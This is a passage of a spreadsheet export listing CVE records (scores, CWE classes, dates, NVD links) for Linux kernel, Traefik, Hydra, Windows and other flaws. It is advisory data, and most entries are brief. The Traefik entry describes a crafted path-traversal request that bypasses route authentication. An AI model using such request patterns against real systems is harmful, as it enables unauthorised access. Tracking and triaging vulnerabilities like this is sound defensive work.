wb_queue_isw() call. Following is the process that triggers the issue:
      CPU A (umount)           |          CPU B (writeback)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                                 inode_switch_wbs/cleanup_offline_cgwb
                                  atomic_inc(&amp;isw_nr_in_flight)
                                  inode_prepare_wbs_switch
                                   -&gt; passes SB_ACTIVE check
                                   __iget(inode)
 generic_shutdown_super
  sb-&gt;s_flags &amp;= ~SB_ACTIVE
  cgroup_writeback_umount(sb)
   smp_mb()
   atomic_read(&amp;isw_nr_in_flight)
   rcu_barrier()
    -&gt; no pending RCU callbacks
   flush_workqueue(isw_wq)
    -&gt; nothing queued, returns
  evict_inodes(sb)
   -&gt; Inode skipped as isw still holds a ref.
  sop-&gt;put_super(sb)
   /* destroys percpu counters */
  -&gt; VFS: Busy inodes after unmount!
                                  wb_queue_isw()
                                   queue_work(isw_wq, ...)
                                  /* later in work function */
                                  inode_switch_wbs_work_fn
                                   process_inode_switch_wbs
                                    iput() -&gt; evict
                                     percpu_counter_dec() // UAF!
Fix this by extending the RCU read-side critical section in
inode_switch_wbs() and cleanup_offline_cgwb() to cover from
inode_prepare_wbs_switch() through wb_queue_isw().  Since there is
no sleep in this window, rcu_read_lock() can be used.  Then add a
synchronize_rcu() in cgroup_writeback_umount() before the existing
rcu_barrier(), so that all in-flight switchers that have passed the
SB_ACTIVE check have completed queue_work() before flush_workqueue()
is called.
The existing rcu_barrier() is intentionally retained so this fix can
be backported unchanged to stable kernels (5.10.y, 6.6.y, ...) that
still queue switches via queue_rcu_work(). It is a no-op on current
mainline (since commit e1b849cfa6b6 ("writeback: Avoid contention on
wb-&gt;list_lock when switching inodes")) and is removed in a follow-up
patch.</t>
        </is>
      </c>
      <c r="M2105" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64378</t>
        </is>
      </c>
    </row>
    <row r="2106">
      <c r="A2106" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2106" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64381</t>
        </is>
      </c>
      <c r="C2106" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2106" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2106" s="5" t="inlineStr"/>
      <c r="F2106" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2106" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H2106" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I2106" s="5" t="inlineStr">
        <is>
          <t>2026-07-25</t>
        </is>
      </c>
      <c r="J2106" s="5" t="inlineStr"/>
      <c r="K2106" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L2106" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb: client: Fix next buffer leak in receive_encrypted_standard()
receive_encrypted_standard() allocates next_buffer before checking
whether the number of compound PDUs already reached MAX_COMPOUND. If
the limit check fails, the function returns immediately and the newly
allocated next_buffer is not assigned to server-&gt;smallbuf/server-&gt;bigbuf,
making it leaked.
Move the MAX_COMPOUND check before allocating next_buffer.</t>
        </is>
      </c>
      <c r="M2106" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64381</t>
        </is>
      </c>
    </row>
    <row r="2107">
      <c r="A2107" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2107" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67309</t>
        </is>
      </c>
      <c r="C2107" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2107" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2107" s="5" t="inlineStr"/>
      <c r="F2107" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2107" s="5" t="inlineStr">
        <is>
          <t>nginx, kubernetes</t>
        </is>
      </c>
      <c r="H2107" s="5" t="inlineStr"/>
      <c r="I2107" s="5" t="inlineStr">
        <is>
          <t>2026-08-01</t>
        </is>
      </c>
      <c r="J2107" s="5" t="inlineStr"/>
      <c r="K2107" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L2107" s="5" t="inlineStr">
        <is>
          <t>Traefik versions &gt;= v3.7.0 and &lt;= v3.7.7 contain a path traversal vulnerability in the Kubernetes Ingress NGINX provider's RewriteTarget middleware (generated from the nginx.ingress.kubernetes.io/rewrite-target annotation). When an Ingress path uses a regex that captures attacker-controlled text without requiring a path separator (e.g., path /api(.*) with rewrite target /$1), a crafted request such as /api../admin matches the public router, is rewritten to a dot-segment traversal path (/../admin), and is forwarded without post-replacement normalization validation. A backend that normalizes dot segments resolves the path to a protected endpoint (e.g., /admin) reachable only through a separate router secured with BasicAuth, DigestAuth, or ForwardAuth, resulting in route-level authentication bypass. The issue is fixed in v3.7.8.</t>
        </is>
      </c>
      <c r="M2107" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67309</t>
        </is>
      </c>
    </row>
    <row r="2108">
      <c r="A2108" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2108" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67846</t>
        </is>
      </c>
      <c r="C2108" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2108" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2108" s="5" t="inlineStr"/>
      <c r="F2108" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2108" s="5" t="inlineStr"/>
      <c r="H2108" s="5" t="inlineStr"/>
      <c r="I2108" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J2108" s="5" t="inlineStr"/>
      <c r="K2108" s="5" t="inlineStr">
        <is>
          <t>CWE-266</t>
        </is>
      </c>
      <c r="L2108" s="5" t="inlineStr">
        <is>
          <t>Berkeley Out-of-Order Machine (BOOM) commit 5223e44cfeb26f41380057a2eb4d651197475f69 contains a potential incorrect privilege assignment issue in the v3 and v4 NBDTLB implementations. The raw mstatus.SUM value participates in the read and write permission logic without an explicit local satp.MODE validity check at the use site</t>
        </is>
      </c>
      <c r="M2108" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67846</t>
        </is>
      </c>
    </row>
    <row r="2109">
      <c r="A2109" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2109" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67961</t>
        </is>
      </c>
      <c r="C2109" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2109" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2109" s="5" t="inlineStr"/>
      <c r="F2109" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2109" s="5" t="inlineStr"/>
      <c r="H2109" s="5" t="inlineStr"/>
      <c r="I2109" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J2109" s="5" t="inlineStr"/>
      <c r="K2109" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L2109" s="5" t="inlineStr">
        <is>
          <t>An issue in O2OA v.10.0.2 allows a local attacker to execute arbitrary code via the the sandbox mechanism of the Invoke script execution.</t>
        </is>
      </c>
      <c r="M2109" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67961</t>
        </is>
      </c>
    </row>
    <row r="2110">
      <c r="A2110" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2110" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68508</t>
        </is>
      </c>
      <c r="C2110" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2110" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2110" s="5" t="inlineStr"/>
      <c r="F2110" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2110" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H2110" s="5" t="inlineStr"/>
      <c r="I2110" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J2110" s="5" t="inlineStr"/>
      <c r="K2110" s="5" t="inlineStr">
        <is>
          <t>CWE-470, CWE-94</t>
        </is>
      </c>
      <c r="L2110" s="5" t="inlineStr">
        <is>
          <t>Hydra is a framework for elegantly configuring complex applications. Prior to 1.3.4, hydra.utils.instantiate() resolves and calls Python objects selected by configuration through _resolve_target() in hydra/_internal/instantiate/_instantiate2.py, allowing attacker-controlled target values and arguments to choose dangerous callables. A consuming application, library, CLI workflow, or model loader that passes untrusted configuration, CLI overrides, or model metadata into hydra.utils.instantiate() can therefore execute arbitrary code in its own process, including reading or modifying files and credentials or terminating the process. Version 1.3.4 adds target blocking with an explicit HYDRA_INSTANTIATE_ALLOWLIST_OVERRIDE escape hatch. This issue is fixed in version 1.3.4.</t>
        </is>
      </c>
      <c r="M2110" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68508</t>
        </is>
      </c>
    </row>
    <row r="2111">
      <c r="A2111" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2111" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68787</t>
        </is>
      </c>
      <c r="C2111" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2111" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2111" s="5" t="inlineStr"/>
      <c r="F2111" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2111" s="5" t="inlineStr"/>
      <c r="H2111" s="5" t="inlineStr"/>
      <c r="I2111" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2111" s="5" t="inlineStr"/>
      <c r="K2111" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2111" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M2111" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68787</t>
        </is>
      </c>
    </row>
    <row r="2112">
      <c r="A2112" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2112" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68832</t>
        </is>
      </c>
      <c r="C2112" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2112" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2112" s="5" t="inlineStr"/>
      <c r="F2112" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2112" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2112" s="5" t="inlineStr"/>
      <c r="I2112" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2112" s="5" t="inlineStr"/>
      <c r="K2112" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L2112" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows NTFS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2112" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68832</t>
        </is>
      </c>
    </row>
    <row r="2113">
      <c r="A2113" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2113" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68841</t>
        </is>
      </c>
      <c r="C2113" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2113" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2113" s="5" t="inlineStr"/>
      <c r="F2113" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2113" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2113" s="5" t="inlineStr"/>
      <c r="I2113" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2113" s="5" t="inlineStr"/>
      <c r="K2113" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2113" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="M2113" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68841</t>
        </is>
      </c>
    </row>
    <row r="2114">
      <c r="A2114" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2114" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68844</t>
        </is>
      </c>
      <c r="C2114" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2114" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2114" s="5" t="inlineStr"/>
      <c r="F2114" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2114" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2114" s="5" t="inlineStr"/>
      <c r="I2114" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2114" s="5" t="inlineStr"/>
      <c r="K2114" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2114" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Storage Spaces Controller allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M2114" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68844</t>
        </is>
      </c>
    </row>
    <row r="2115">
      <c r="A2115" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2115" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68845</t>
        </is>
      </c>
      <c r="C2115" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2115" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2115" s="5" t="inlineStr"/>
      <c r="F2115" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2115" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2115" s="5" t="inlineStr"/>
      <c r="I2115" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2115" s="5" t="inlineStr"/>
      <c r="K2115" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2115" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Program Compatibility Assistant Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2115" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68845</t>
        </is>
      </c>
    </row>
    <row r="2116">
      <c r="A2116" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2116" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68848</t>
        </is>
      </c>
      <c r="C2116" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2116" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2116" s="5" t="inlineStr"/>
      <c r="F2116" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2116" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2116" s="5" t="inlineStr"/>
      <c r="I2116" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2116" s="5" t="inlineStr"/>
      <c r="K2116" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2116" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Print Spooler Components allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2116" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68848</t>
        </is>
      </c>
    </row>
    <row r="2117">
      <c r="A2117" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2117" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68850</t>
        </is>
      </c>
      <c r="C2117" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2117" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2117" s="5" t="inlineStr"/>
      <c r="F2117" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2117" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H2117" s="5" t="inlineStr"/>
      <c r="I2117" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2117" s="5" t="inlineStr"/>
      <c r="K2117" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2117" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Account allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2117" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68850</t>
        </is>
      </c>
    </row>
    <row r="2118">
      <c r="A2118" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2118" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68875</t>
        </is>
      </c>
      <c r="C2118" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2118" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2118" s="5" t="inlineStr"/>
      <c r="F2118" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2118" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2118" s="5" t="inlineStr"/>
      <c r="I2118" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2118" s="5" t="inlineStr"/>
      <c r="K2118" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="L2118" s="5" t="inlineStr">
        <is>
          <t>Buffer over-read in Windows NTFS allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M2118" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68875</t>
        </is>
      </c>
    </row>
    <row r="2119">
      <c r="A2119" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2119" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68877</t>
        </is>
      </c>
      <c r="C2119" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2119" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2119" s="5" t="inlineStr"/>
      <c r="F2119" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2119" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2119" s="5" t="inlineStr"/>
      <c r="I2119" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2119" s="5" t="inlineStr"/>
      <c r="K2119" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2119" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Storage Spaces Controller allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M2119" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68877</t>
        </is>
      </c>
    </row>
    <row r="2120">
      <c r="A2120" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2120" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68885</t>
        </is>
      </c>
      <c r="C2120" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2120" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2120" s="5" t="inlineStr"/>
      <c r="F2120" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2120" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H2120" s="5" t="inlineStr"/>
      <c r="I2120" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2120" s="5" t="inlineStr"/>
      <c r="K2120" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2120" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2120" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68885</t>
        </is>
      </c>
    </row>
    <row r="2121">
      <c r="A2121" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2121" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68888</t>
        </is>
      </c>
      <c r="C2121" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2121" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2121" s="5" t="inlineStr"/>
      <c r="F2121" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2121" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H2121" s="5" t="inlineStr"/>
      <c r="I2121" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2121" s="5" t="inlineStr"/>
      <c r="K2121" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2121" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2121" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68888</t>
        </is>
      </c>
    </row>
    <row r="2122">
      <c r="A2122" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2122" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68890</t>
        </is>
      </c>
      <c r="C2122" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2122" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2122" s="5" t="inlineStr"/>
      <c r="F2122" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2122" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H2122" s="5" t="inlineStr"/>
      <c r="I2122" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2122" s="5" t="inlineStr"/>
      <c r="K2122" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2122" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2122" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68890</t>
        </is>
      </c>
    </row>
    <row r="2123">
      <c r="A2123" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2123" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68892</t>
        </is>
      </c>
      <c r="C2123" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2123" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2123" s="5" t="inlineStr"/>
      <c r="F2123" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2123" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H2123" s="5" t="inlineStr"/>
      <c r="I2123" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2123" s="5" t="inlineStr"/>
      <c r="K2123" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2123" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2123" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68892</t>
        </is>
      </c>
    </row>
    <row r="2124">
      <c r="A2124" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2124" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68896</t>
        </is>
      </c>
      <c r="C2124" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2124" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2124" s="5" t="inlineStr"/>
      <c r="F2124" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2124" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2124" s="5" t="inlineStr"/>
      <c r="I2124" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2124" s="5" t="inlineStr"/>
      <c r="K2124" s="5" t="inlineStr">
        <is>
          <t>CWE-36</t>
        </is>
      </c>
      <c r="L2124" s="5" t="inlineStr">
        <is>
          <t>Absolute path traversal in Microsoft Windows Search Component allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2124" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68896</t>
        </is>
      </c>
    </row>
    <row r="2125">
      <c r="A2125" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2125" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69265</t>
        </is>
      </c>
      <c r="C2125" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2125" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2125" s="5" t="inlineStr"/>
      <c r="F2125" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2125" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2125" s="5" t="inlineStr"/>
      <c r="I2125" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2125" s="5" t="inlineStr"/>
      <c r="K2125" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2125" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows NTFS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2125" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69265</t>
        </is>
      </c>
    </row>
    <row r="2126">
      <c r="A2126" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2126" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69269</t>
        </is>
      </c>
      <c r="C2126" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2126" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2126" s="5" t="inlineStr"/>
      <c r="F2126" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2126" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H2126" s="5" t="inlineStr"/>
      <c r="I2126" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2126" s="5" t="inlineStr"/>
      <c r="K2126" s="5" t="inlineStr">
        <is>
          <t>CWE-191</t>
        </is>
      </c>
      <c r="L2126" s="5" t="inlineStr">
        <is>
          <t>Integer underflow (wrap or wraparound) in Microsoft Standard XPS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2126" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69269</t>
        </is>
      </c>
    </row>
    <row r="2127">
      <c r="A2127" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2127" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69270</t>
        </is>
      </c>
      <c r="C2127" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2127" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2127" s="5" t="inlineStr"/>
      <c r="F2127" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2127" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2127" s="5" t="inlineStr"/>
      <c r="I2127" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
